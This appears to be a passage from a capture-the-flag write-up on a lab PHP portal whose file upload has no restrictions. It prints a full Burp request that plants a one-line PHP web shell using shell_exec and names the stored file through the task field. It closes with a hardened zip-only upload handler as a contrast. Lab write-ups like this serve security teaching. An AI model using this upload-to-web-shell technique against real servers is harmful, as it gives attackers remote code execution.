As Paul, we have access to a file upload service that supposedly accepts only zip files.
From the source code, however, it is obvious that there are no upload restrictions at all (not even on file type or file name).
Moreover, we control the name under which the uploaded file is stored via the task field. Using Burp Suite, we can upload a PHP one-liner that gives remote code execution.
POST /portal/includes/fileController.php HTTP/1.1
Host: 10.10.10.228
Content-Length: 338
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryHBZNum5szzVSddPn
Origin: http://10.10.10.228
Referer: http://10.10.10.228/portal/php/files.php
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: PHPSESSID=paul47200b180ccd6835d25d034eeb6e6390; token=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjp7InVzZXJuYW1lIjoicGF1bCJ9fQ.7pc5S1P76YsrWhi_gu23bzYLYWxqORkr0WtEz_IUtCU
Connection: close

------WebKitFormBoundaryHBZNum5szzVSddPn
Content-Disposition: form-data; name="file"; filename="shell.php"
Content-Type: application/x-httpd-php

<?php echo shell_exec($_GET['cmd']); ?>
------WebKitFormBoundaryHBZNum5szzVSddPn
Content-Disposition: form-data; name="task"

nothing.php
------WebKitFormBoundaryHBZNum5szzVSddPn--
While I first tried to use the PHP system command, there seems to be an error when performing the upload. I suspect that system is not allowed by the PHP configuration. shell_exec solves the issue.
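For contrast with the unrestricted handler described above, here is a hardened zip-only upload handler. This is an added example, not the portal's own fileController.php: it ignores the client-supplied file name, Content-Type and task field, checks the content for the zip signature, and stores the file under a server-generated name in a directory outside the web root ($uploadDir is an assumed, hypothetical path).

```php
<?php
// Added example: hardened zip-only upload handler (not the portal's code).
// Assumes $uploadDir is a directory outside the web root where PHP is not executed.

function storeZipUpload(array $file, string $uploadDir): string
{
    if (!isset($file['error']) || $file['error'] !== UPLOAD_ERR_OK) {
        throw new RuntimeException('upload failed');
    }
    // Only accept files that actually arrived through PHP's upload mechanism.
    if (!is_uploaded_file($file['tmp_name'])) {
        throw new RuntimeException('not an uploaded file');
    }
    // Decide the type from the content, not from the client-supplied name or Content-Type.
    // A local-file zip entry starts with "PK\x03\x04"; empty archives are rejected on purpose.
    $fh = fopen($file['tmp_name'], 'rb');
    $magic = $fh ? fread($fh, 4) : '';
    if ($fh) {
        fclose($fh);
    }
    if ($magic !== "PK\x03\x04") {
        throw new RuntimeException('not a zip archive');
    }
    // Never reuse the client's file name (or any other request field) as the stored name.
    $name = bin2hex(random_bytes(16)) . '.zip';
    $dest = rtrim($uploadDir, '/') . '/' . $name;
    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        throw new RuntimeException('could not store file');
    }
    chmod($dest, 0640); // readable by the application, never executable
    return $name;
}

$uploadDir = '/var/portal_uploads'; // hypothetical path outside the document root
try {
    $stored = storeZipUpload($_FILES['file'] ?? [], $uploadDir);
    echo json_encode(['stored' => $stored]);
} catch (RuntimeException $e) {
    http_response_code(400);
    echo json_encode(['error' => $e->getMessage()]);
}
```

With this handler the shell.php upload shown above is rejected on content, and even a file that passes the signature check is written with a random .zip name where the web server will not interpret it as PHP.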